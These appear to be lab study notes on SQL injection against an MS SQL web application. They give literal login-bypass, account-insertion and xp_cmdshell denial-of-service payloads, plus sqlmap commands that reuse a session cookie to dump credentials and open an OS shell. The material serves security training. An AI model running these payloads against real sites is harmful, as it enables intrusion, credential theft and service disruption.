SQL Injection

 --- It is basic attack gain unauthorized access to a database or retrive information directly from the database.

--- It is flaw or defect of web application not a database or server issue

--- Understanding when and how web application connects to a database server in order to access data

--- Extracting basic SQL Injection flaws and vulnerabilities

--- Testing web application for Blind SQL Injection vulnerabilities

--- Scanning web servers and analyzing the reports

--- Securing information in web application and web servers

1. SQL Injection Attacks on MS SQL Database

-- Log on Without valid credentials
-- Test for SQL Injection
-- Create your own database
-- Directory lisiting
-- Enforce Denial of Service attacks

---> Open any browser in windows and go to shopping website  and go to login

---> We try to login unauthorized user by query and click to login
username = "or""="
password = "or""="

---> Making user without use register option type following query in username feild
blah';insert into login values('mitesh','mitesh123'); --

---> To perform Denial of Service attack type the following query in username feild
blah';exec master..xp_cmdshell'ping [moviewebsite] -l 65000 -t'; --

2. Performing SQL Injection attack against MSSQL to extract Databases and WebShell using SQLMAP  

--- Extract the MSSQL Database using SQLMAP


---> Log in the application and note down the URL in the address bar

---> Copy the  cookie with inspect element in console and search below document.cookie

---> Open a terminal and type a command
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" --dbs  --- This query enumerate the database information [Y Y N]

---> We found a database  now find a tables in database
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -D [database name] --tables

---> Intresting table found then find out columns
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -D [database name] -T [table name] --columns

---> Now we are dump all the table content
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -D [database name] -T [table name] --dump

---> We have getting a Username and Password

---> Gain the access of OS Shell machine
# sqlmap -u "URL of the website" --cookie="paste the cookie we have copy" -- os-shell  (Y)

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